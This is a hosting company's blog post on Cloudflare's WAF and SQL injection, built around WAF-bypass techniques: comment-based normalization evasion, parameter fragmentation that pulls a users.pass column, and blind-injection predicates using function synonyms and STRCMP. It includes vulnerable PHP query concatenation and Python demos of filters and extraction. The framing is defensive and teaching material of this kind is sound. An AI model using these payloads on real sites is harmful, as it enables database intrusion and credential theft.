Bobcares

Cloudflare WAF SQL Injection Management

Jul 11, 2022

Cloudflare's Web Application Firewall (WAF) is effective at stopping SQL injection and other application-layer attacks before they reach the origin server, which helps keep application data secure.

Bobcares answers all questions no matter the size, as part of our Server management services

Let us take a look at Cloudflare WAF SQL Injection in detail.

SQLi

A SQL injection attack involves inserting or “injecting” a SQL query into the application via the client's input data. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), perform database administration operations (such as shutting down the DBMS), recover the content of a given file on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection is a type of injection attack in which SQL commands are injected into data-plane input in order to alter the execution of the application's predefined SQL commands.

Bypassing WAF: SQL Injection – Normalization Method

Example 1 of a vulnerability in the request normalization function.

The following request is stopped by the WAF, so it cannot be used to launch an attack:

 /?id=1+union+select+1,2,3/*

If the WAF has the corresponding weakness, the following request is forwarded and successfully executed:

 /?id=1/*union*/union/*select*/select+1,2,3/*

The WAF matches the first occurrence of each keyword (the one inside the comment), rewrites it, and leaves the second, real occurrence untouched. After the WAF has processed it, the request looks like this:

 index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*

Because /*uni X on*/ and /*sel X ect*/ are SQL comments, the database still sees union select 1,2,3.

Note that this example only works when the WAF sanitizes the request (cleans the matched pattern out of the incoming data) rather than blocking the request from the attacking source outright.

Example 2 of a vulnerability in the request normalization function.

As before, the following request is stopped by the WAF:

 /?id=1+union+select+1,2,3/*

If the WAF has the corresponding weakness, the following request is forwarded: the keywords are split by empty comments, so no signature matches, and the WAF then strips the /**/ sequences before passing the value on:

 /?id=1+un/**/ion+sel/**/ect+1,2,3--

After the WAF has processed it, the SQL query executed by the database is:

SELECT * from table where id =1 union select 1,2,3--

Any symbol sequence that the WAF cuts out can be used instead of the /**/ construction (e.g., #####, %00). As with the first example, this only works when the WAF cleans the request rather than blocking it.
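The two normalization defects above can be modelled in a few lines. The following is an added example written for this page, not Cloudflare's or any real WAF's code: weak_waf reproduces a filter that rewrites the first keyword hit and strips /**/ instead of blocking, hardened_waf normalizes the value the way the database will see it before matching and blocks on a hit, and as_seen_by_db stands in for the MySQL tokenizer's treatment of comments. The two-keyword signature list and the payloads are constructed stand-ins for a real ruleset.

```python
import re
from urllib.parse import unquote_plus

# Two-keyword signature list: a constructed stand-in for a real ruleset.
KEYWORDS = ("union", "select")
SIGNATURE = re.compile(r"\b(union|select)\b", re.IGNORECASE)
# A closed /* ... */ comment, or an unterminated one running to the end of the value.
COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.DOTALL)


def as_seen_by_db(value: str) -> str:
    """Decode the parameter the way the application will and treat every
    comment as whitespace, as MySQL does: '/*union*/union' is a comment
    followed by a real UNION, while 'un/**/ion' is two separate tokens."""
    decoded = unquote_plus(value)
    return re.sub(r"\s+", " ", COMMENT.sub(" ", decoded)).strip()


def weak_waf(raw_param: str) -> str:
    """Defective WAF modelled on the two examples above. It cleans instead of blocking:
    1. the first hit of each keyword is rewritten ('union' -> 'uni X on'), so a
       second, real occurrence survives;
    2. it then strips the empty comment '/**/', which re-joins keywords the
       attacker split to dodge step 1.
    Returns the value forwarded to the application; it never blocks."""
    cleaned = raw_param
    for kw in KEYWORDS:
        cleaned = re.sub(kw, lambda m: m.group(0)[:3] + " X " + m.group(0)[3:],
                         cleaned, count=1, flags=re.IGNORECASE)
    return cleaned.replace("/**/", "")


def hardened_waf(raw_param: str):
    """Normalize first, match on the normalized text, and block (return None)
    on a hit. Anything it lets through is forwarded byte-for-byte, unrewritten."""
    if SIGNATURE.search(as_seen_by_db(raw_param)):
        return None
    return raw_param


def union_select_reaches_db(forwarded) -> bool:
    """True when the query built from the forwarded value carries a real UNION SELECT."""
    if forwarded is None:          # blocked by the WAF
        return False
    return re.search(r"\bunion\s+select\b", as_seen_by_db(forwarded), re.IGNORECASE) is not None


if __name__ == "__main__":
    for payload in ("1+union+select+1,2,3/*",
                    "1/*union*/union/*select*/select+1,2,3/*",
                    "1+un/**/ion+sel/**/ect+1,2,3--"):
        print(f"{payload:42} weak WAF: {union_select_reaches_db(weak_waf(payload))!s:5} "
              f"hardened WAF: {union_select_reaches_db(hardened_waf(payload))}")
```

The plain request is mangled by both filters, but the two evasions from the examples reach the database through weak_waf: the first because a real keyword survives behind the rewritten decoy, the second because the filter itself glues un/**/ion back into union. hardened_waf blocks the first and lets the second through unchanged, which is harmless because MySQL never sees a UNION in it.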

Bypassing WAF: SQL Injection – HTTP Parameter Fragmentation (HPF)

The following PHP code is vulnerable: each parameter is concatenated straight into the query.

 Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
 Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);

Against this code, a request such as the following is stopped by the WAF:

 /?a=1+union+select+1,2/*

With HPF the payload is split across several parameters, each of which looks harmless on its own, and comment markers join the fragments back together once the application has concatenated them:

 /?a=1+union/*&b=*/select+1,2
 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--

The resulting SQL queries are:

 select * from table where a=1 union/* and b=*/select 1,2
 select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

The attack works because the WAF inspects each parameter value separately, while the database sees the concatenated query, in which "/* and b=*/" and "/* limit */" are plain comments.
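To make the fragmentation concrete, here is an added example (written for this page, not the original author's code) that rebuilds the vulnerable concatenation in Python, runs the resulting query against a constructed in-memory SQLite database so the leaked column is visible, and puts a per-parameter signature check beside a check over the concatenated values and beside the hardened application code. The tables items and users, the row contents and the integer contract on a, b and c are assumptions of the example.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed in-memory schema; 'items' stands in for the page's 'table'.
SCHEMA = """
create table items(a integer, b integer);
insert into items values (1, 2), (7, 8);
create table users(name text, pass text);
insert into users values ('admin', 's3cret');
"""
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def params(qs: str) -> dict:
    """First value of each query-string parameter, '+' and %xx decoded like PHP's $_GET."""
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def vulnerable_query(qs: str) -> str:
    """Same string concatenation as the PHP above:
    Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c'])"""
    p = params(qs)
    sql = f"select * from items where a={p['a']} and b={p['b']}"
    if "c" in p:
        sql += f" limit {p['c']}"
    return sql


def run_vulnerable(qs: str) -> list:
    """Execute the concatenated query against the constructed database."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con.execute(vulnerable_query(qs)).fetchall()


def per_parameter_inspection(qs: str) -> bool:
    """A WAF that checks each parameter value on its own. True = would block."""
    return any(UNION_SELECT.search(v) for v in params(qs).values())


def concatenated_inspection(qs: str) -> bool:
    """Checks the values joined in the order the application concatenates them."""
    return UNION_SELECT.search(" ".join(params(qs).values())) is not None


def safe_query(qs: str):
    """Hardened application: enforce the integer contract, then bind parameters."""
    p = params(qs)
    try:
        a, b = int(p["a"]), int(p["b"])
        limit = int(p["c"]) if "c" in p else -1      # SQLite: LIMIT -1 means no limit
    except (KeyError, ValueError):
        return None                                   # reject instead of guessing
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con.execute("select * from items where a=? and b=? limit ?", (a, b, limit)).fetchall()


if __name__ == "__main__":
    for qs in ("a=1+union+select+1,2/*",
               "a=1+union/*&b=*/select+1,2",
               "a=1+union/*&b=*/select+1,pass/*&c=*/from+users--"):
        print(qs)
        print("  per-parameter WAF blocks:", per_parameter_inspection(qs),
              " concatenated check blocks:", concatenated_inspection(qs))
        if not per_parameter_inspection(qs):
            print("  query:", vulnerable_query(qs))
            print("  rows :", run_vulnerable(qs))
```

The per-parameter check never sees union and select in the same value, so both fragmented requests pass it, and the third one returns the users.pass value alongside the rows of items. Inspecting the concatenated values catches the pattern, but the durable fix is in safe_query: the application validates the parameter types it expects and binds them, so the fragments can never be joined into SQL.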

Bypassing WAF: Blind SQL Injection Using logical requests AND/OR

The following requests enable a successful attack against many WAFs:

 /?id=1+OR+0x50=0x50
 /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

Signatures are bypassed by replacing the SQL functions that the WAF signatures look for with their synonyms, so the blind SQL injection can still be exploited:

 substring() -> mid(), substr()
 ascii() -> hex(), bin()
 benchmark() -> sleep()

A wide variety of logical expressions can supply the true/false condition of a blind SQL injection:

 and 1
 or 1
 and 1=1
 and 2<3
 and 'a'='a'
 and 'a'<>'b'
 and char(32)=' '
 and 3<=2
 and 5<=>4
 and 5<=>5
 and 5 is null
 or 5 is not null

An example of various request notations with the same meaning (each tests whether the first character of the password column is '*', i.e. 0x2a):

 select user from mysql.user where user = 'user' OR mid(password,1,1)='*'
 select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a
 select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a')
 select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]'
 select user from mysql.user where user = 'user' OR mid(password,1,1) like '*'
 select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]'
 select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42
 select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42
 select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1
 select user from mysql.user where user = 'user' OR position(0x2a in password)=1
 select user from mysql.user where user = 'user' OR locate(0x2a,password)=1

(On MySQL 5.7 and later the mysql.user column is named authentication_string rather than password; the notations themselves are unchanged.)

Known (equality test on the first character):

 substring((select 'password'),1,1) = 0x70
 substr((select 'password'),1,1) = 0x70
 mid((select 'password'),1,1) = 0x70

New (three-way comparison; 0x69, 0x70 and 0x71 are 'i', 'p' and 'q'):

 strcmp(left('password',1), 0x69) = 1
 strcmp(left('password',1), 0x70) = 0
 strcmp(left('password',1), 0x71) = -1

STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the first argument is smaller than the second according to the current sort order, and 1 otherwise. Because it answers "smaller, equal or greater" rather than only "equal or not", each character can be located by binary search instead of by trying every candidate value in turn.
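The practical difference between the equality predicates and the STRCMP predicate is the number of requests a blind extraction needs. The following is an added example written for this page, not the original author's tooling: BlindOracle stands in for the HTTP round trip (each method is one request whose true/false response is observed), the secret and the printable-ASCII search range are constructed, and the byte-wise ordering assumes a BINARY collation, since with a case-insensitive collation STRCMP('a','A') is 0.

```python
SECRET = "password"        # constructed; the value the injected predicate reads
LO, HI = 0x20, 0x7e        # printable ASCII; constructed search range


class BlindOracle:
    """Stand-in for sending one predicate per request and reading true/false."""

    def __init__(self, secret: str):
        self.secret, self.requests = secret, 0

    def equals(self, pos: int, byte: int) -> bool:
        """... AND mid(col,POS,1)=0xNN     (POS is 1-based, as in SQL)"""
        self.requests += 1
        return pos <= len(self.secret) and ord(self.secret[pos - 1]) == byte

    def prefix_greater(self, guess: str) -> bool:
        """... AND strcmp(left(col,LEN),'GUESS')=1     (LEN = len(guess))"""
        self.requests += 1
        return self.secret[:len(guess)] > guess


def extract_by_equality(oracle: BlindOracle) -> str:
    """Linear scan with the equality predicate: up to 95 requests per character,
    and a full failed scan to detect the end of the string."""
    out = ""
    while True:
        for byte in range(LO, HI + 1):
            if oracle.equals(len(out) + 1, byte):
                out += chr(byte)
                break
        else:
            return out             # no byte matched: past the end of the secret


def extract_by_strcmp(oracle: BlindOracle) -> str:
    """Binary search per character with the three-way comparison."""
    out = ""
    while True:
        lo, hi = LO, HI
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.prefix_greater(out + chr(mid)):
                lo = mid + 1       # the real character sorts after chr(mid)
            else:
                hi = mid
        # One equality request confirms the candidate; it fails once the string
        # has ended (the shorter prefix is never 'greater', so lo collapses to LO).
        if not oracle.equals(len(out) + 1, lo):
            return out
        out += chr(lo)


def request_counts(secret: str) -> tuple:
    """(requests for the equality scan, requests for the strcmp search) on a secret."""
    eq, cmp_ = BlindOracle(secret), BlindOracle(secret)
    assert extract_by_equality(eq) == extract_by_strcmp(cmp_) == secret
    return eq.requests, cmp_.requests


if __name__ == "__main__":
    equality, strcmp = request_counts(SECRET)
    print(f"mid()=0xNN scan : {equality} requests")
    print(f"strcmp(left())  : {strcmp} requests")
```

For an eight-character secret the equality scan costs several hundred requests while the STRCMP search stays under eighty, which is why a WAF signature list that only knows substring() and ascii() misses the cheaper variant entirely.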

Protect websites against SQL injections and more

Cloudflare's Web Application Firewall (WAF) guards against threats and vulnerabilities that target the application layer, including SQL injection, cross-site scripting (XSS) and zero-day attacks, and covers the most serious web application security issues identified by OWASP. By default it runs ModSecurity-based rule sets; it can also manage existing rule sets as well as custom rules. Rule changes take effect in less than 30 seconds.

Cloud deployment with DDoS mitigation and a CDN. Because Cloudflare's WAF is a cloud-based service, there is no hardware or software to install or maintain. The WAF can be deployed with one click and tuned to suit your requirements.

Since the WAF is part of the overall Cloudflare service, users gain further capabilities at no extra cost: the same setup protects a website against DDoS attacks and serves it through Cloudflare's global content delivery network to make it load faster.

[Need assistance with similar queries? We are here to help]

Conclusion

To conclude, Cloudflare's Web Application Firewall (WAF) safeguards websites against SQL injection, cross-site scripting (XSS) and zero-day attacks, as well as the application-layer vulnerabilities and threats identified by OWASP. As the bypass techniques above show, signature-based filtering can be evaded by normalization tricks, parameter fragmentation and function synonyms, so the WAF should complement, not replace, input validation and parameterized queries in the application itself.

PREVENT YOUR SERVER FROM CRASHING!

Never again lose customers to poor server speed! Let us help you.

Our server experts will monitor & maintain your server 24/7 so that it remains lightning fast and secure.

GET STARTED
